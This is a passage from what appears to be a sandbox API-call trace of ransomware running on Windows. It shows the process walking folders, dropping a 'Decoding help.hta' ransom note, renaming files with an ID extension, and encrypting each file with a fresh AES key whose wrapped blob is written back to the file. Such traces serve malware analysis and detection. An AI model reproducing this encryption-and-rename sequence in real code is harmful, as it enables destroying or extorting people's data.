nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0040.205] lstrcmpW (lpString1=".", lpString2="VC") returned -1 [0040.205] lstrcmpW (lpString1="..", lpString2="VC") returned -1 [0040.205] lstrcmpiW (lpString1="windows", lpString2="VC") returned 1 [0040.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0040.207] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0040.207] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="VC" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC" [0040.207] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\*.*" [0040.207] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0040.207] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10cce938, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x308 [0040.756] CloseHandle (hObject=0x308) returned 1 [0040.756] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81305af3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81305af3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0040.756] lstrcmpW (lpString1=".", lpString2="VGX") returned -1 [0040.756] lstrcmpW (lpString1="..", lpString2="VGX") returned -1 [0040.756] lstrcmpiW (lpString1="windows", lpString2="VGX") returned 1 [0041.084] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0041.084] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0041.084] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="VGX" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX" [0041.084] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\*.*" [0041.084] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0041.084] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9400458, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x35c [0041.099] CloseHandle (hObject=0x35c) returned 1 [0041.100] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f4696f0, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 1 [0041.100] lstrcmpW (lpString1=".", lpString2="VSTA") returned -1 [0041.100] lstrcmpW (lpString1="..", lpString2="VSTA") returned -1 [0041.100] lstrcmpiW (lpString1="windows", lpString2="VSTA") returned 1 [0041.102] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0041.102] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0041.102] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="VSTA" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA" [0041.103] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*.*" [0041.103] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0041.103] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x111fbdc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x35c [0041.111] CloseHandle (hObject=0x35c) returned 1 [0041.111] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274de510, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd6d01960, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d01960, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0041.111] lstrcmpW (lpString1=".", lpString2="VSTO") returned -1 [0041.111] lstrcmpW (lpString1="..", lpString2="VSTO") returned -1 [0041.111] lstrcmpiW (lpString1="windows", lpString2="VSTO") returned 1 [0041.114] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0041.114] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0041.114] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="VSTO" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO" [0041.114] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*.*" [0041.114] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0041.114] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1122be90, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x35c [0041.122] CloseHandle (hObject=0x35c) returned 1 [0041.122] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21a6a110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21a6a110, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0041.122] lstrcmpW (lpString1=".", lpString2="Web Server Extensions") returned -1 [0041.122] lstrcmpW (lpString1="..", lpString2="Web Server Extensions") returned -1 [0041.122] lstrcmpiW (lpString1="windows", lpString2="Web Server Extensions") returned 1 [0041.122] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0041.122] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned 60 [0041.122] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\", lpString2="Web Server Extensions" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions" [0041.122] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\*.*" [0041.122] GlobalMemoryStatus (in: lpBuffer=0x4a4fd10 | out: lpBuffer=0x4a4fd10) [0041.122] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9550a08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x35c [0041.132] CloseHandle (hObject=0x35c) returned 1 [0041.132] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x4a4fd30 | out: lpFindFileData=0x4a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21a6a110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21a6a110, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0041.132] FindClose (in: hFindFile=0x5a58b0 | out: hFindFile=0x5a58b0) returned 1 Thread: id = 130 os_tid = 0x8c8 [0040.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0xba4fd30 | out: lpFindFileData=0xba4fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a57b0 [0041.559] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.559] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xba4fd30 | out: lpFindFileData=0xba4fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.559] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.560] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.560] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xba4fd30 | out: lpFindFileData=0xba4fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0041.560] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*" [0041.560] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.560] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.560] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.560] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d4 [0042.016] WriteFile (in: hFile=0x4d4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xba4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xba4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.017] CloseHandle (hObject=0x4d4) returned 1 [0042.017] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.018] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Setup.xml") returned -1 [0042.018] lstrlenW (lpString="Setup.xml") returned 9 [0042.018] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*" [0042.018] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0042.018] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" [0042.018] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" [0042.018] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0042.018] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.146] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x550 [0042.146] CreateFileMappingA (hFile=0x550, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x554 [0042.146] CryptAcquireContextA (in: phProv=0xba4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xba4fcec*=0x1151d340) returned 1 [0047.457] CryptGenKey (in: hProv=0x1151d340, Algid=0x6610, dwFlags=0x1, phKey=0xba4fce8 | out: phKey=0xba4fce8*=0x5d8b10) returned 1 [0047.457] CryptExportKey (in: hKey=0x5d8b10, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xba4fbe4, pdwDataLen=0xba4fce4 | out: pbData=0xba4fbe4*, pdwDataLen=0xba4fce4*=0x2c) returned 1 [0047.457] MapViewOfFile (hFileMappingObject=0x554, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1860) returned 0x550000 [0048.137] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xba4fbe4*, pdwDataLen=0xba4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xba4fbe4*, pdwDataLen=0xba4fcf8*=0x100) returned 1 [0049.195] CryptEncrypt (in: hKey=0x5d8b10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000, pdwDataLen=0xba4fce4*=0x1860, dwBufLen=0x1860 | out: pbData=0x550000*, pdwDataLen=0xba4fce4*=0x1860) returned 1 [0049.474] UnmapViewOfFile (lpBaseAddress=0x550000) returned 1 [0049.543] CloseHandle (hObject=0x554) returned 1 [0049.543] CryptDestroyKey (hKey=0x5d8b10) returned 1 [0049.543] CryptReleaseContext (hProv=0x1151d340, dwFlags=0x0) returned 1 [0049.543] SetFilePointerEx (in: hFile=0x550, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.543] WriteFile (in: hFile=0x550, lpBuffer=0xba4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xba4fcf8, lpOverlapped=0x0 | out: lpBuffer=0xba4fbe4*, lpNumberOfBytesWritten=0xba4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0051.178] WriteFile (in: hFile=0x550, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xba4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xba4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0051.178] CloseHandle (hObject=0x550) returned 1 [0051.675] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.299] FindNextFileW (in: hFindFile=0x5a57b0, lpFindFileData=0xba4fd30 | out: lpFindFileData=0xba4fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fb9f9e0, ftCreationTime.dwHighDateTime=0x1cbe575, ftLastAccessTime.dwLowDateTime=0x7fb9f9e0, ftLastAccessTime.dwHighDateTime=0x1cbe575, ftLastWriteTime.dwLowDateTime=0x437179c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x30780dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioLR.cab", cAlternateFileName="")) returned 1 [0055.299] lstrcpyW (in: lpString1=0x9a32f30, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*" [0055.299] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0055.299] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0055.299] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0055.299] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VisioLR.cab") returned -1 [0055.299] lstrlenW (lpString="VisioLR.cab") returned 11 [0055.299] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*" [0055.299] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0055.299] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", lpString2="VisioLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" [0055.299] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" [0055.299] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0055.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.438] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x500 [0056.438] CreateFileMappingA (hFile=0x500, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x8dc [0056.438] CryptAcquireContextA (in: phProv=0xba4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xba4fcec*=0x344a3d0) returned 1 [0059.889] CryptGenKey (in: hProv=0x344a3d0, Algid=0x6610, dwFlags=0x1, phKey=0xba4fce8 | out: phKey=0xba4fce8*=0x5da878) returned 1 [0059.889] CryptExportKey (in: hKey=0x5da878, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xba4fbe4, pdwDataLen=0xba4fce4 | out: pbData=0xba4fbe4*, pdwDataLen=0xba4fce4*=0x2c) returned 1 [0059.889] MapViewOfFile (hFileMappingObject=0x8dc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x128a0000 [0059.908] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xba4fbe4*, pdwDataLen=0xba4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xba4fbe4*, pdwDataLen=0xba4fcf8*=0x100) returned 1 [0059.908] CryptEncrypt (in: hKey=0x5da878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x128a0000, pdwDataLen=0xba4fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x128a0000*, pdwDataLen=0xba4fce4*=0x100000) returned 1 [0060.857] UnmapViewOfFile (lpBaseAddress=0x128a0000) returned 1 [0063.986] CloseHandle (hObject=0x8dc) returned 1 [0063.986] CryptDestroyKey (hKey=0x5da878) returned 1 [0063.986] CryptReleaseContext (hProv=0x344a3d0, dwFlags=0x0) returned 1 [0063.986] SetFilePointerEx (in: hFile=0x500, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.986] WriteFile (hFile=0x500, lpBuffer=0xba4fbe4, nNumberOfBytesToWrite=0x100, 